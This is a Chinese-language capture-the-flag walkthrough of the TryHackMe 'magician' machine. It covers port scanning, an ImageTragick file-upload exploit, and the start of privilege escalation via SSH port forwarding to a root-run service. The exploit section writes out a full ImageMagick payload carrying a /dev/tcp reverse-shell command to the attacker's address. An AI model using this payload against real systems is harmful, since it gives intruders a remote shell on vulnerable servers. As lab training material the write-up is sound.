magician

端口扫描

root@ip-10-10-77-221:~/magician# nmap -sTCV  -p 21,8080,8081 --min-rate 1000 10.10.120.29

Starting Nmap 7.60 ( https://nmap.org ) at 2023-09-05 12:21 BST
Nmap scan report for ip-10-10-120-29.eu-west-1.compute.internal (10.10.120.29)
Host is up (0.00019s latency).

PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 2.0.8 or later
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Tue, 05 Sep 2023 11:21:53 GMT
|     Connection: close
|     {"timestamp":"2023-09-05T11:21:53.250+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Tue, 05 Sep 2023 11:21:53 GMT
|     Connection: close
|     {"timestamp":"2023-09-05T11:21:53.050+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Tue, 05 Sep 2023 11:21:53 GMT
|     Connection: close
|     {"timestamp":"2023-09-05T11:21:53.191+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 505 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 465
|     Date: Tue, 05 Sep 2023 11:21:53 GMT
|     <!doctype html><html lang="en"><head><title>HTTP Status 505 
|     HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505 
|_    HTTP Version Not Supported</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open  http       nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician

21 - FTP

给了一段提示内容, 其中指明链接为 https://imagetragick.com

8081

当访问 http://10.10.120.29:8081/ 没有办法上传文件, 我们需要添加 hosts 文件

root@ip-10-10-77-221:~/magician# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	tryhackme.lan	tryhackme
10.10.120.29 magician

经过搜索, 我发现了利用方式 : Picture ImageMagick | PayloadsAllTheThings

后渗透

magician

root@ip-10-10-77-221:~/magician# cat > image.png << EOF
> push graphic-context
> encoding "UTF-8"
> viewbox 0 0 1 1
> affine 1 0 0 1 0 0
> push graphic-context
> image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/10.10.77.221/4444 0<&1 2>&1'
> pop graphic-context
> pop graphic-context
> EOF

上传这个文件我们就可以获取到 Shell

magician —> root

查看端口我发现 6666 端口被一个 root 用户启动的 Python 程序占用

进行端口转发, 然后访问发现这个网页的功能是读取文件内容(会编码后返回)

(remote) magician@magician:/tmp$ ssh -R 8888:127.0.0.1:6666 [email protected]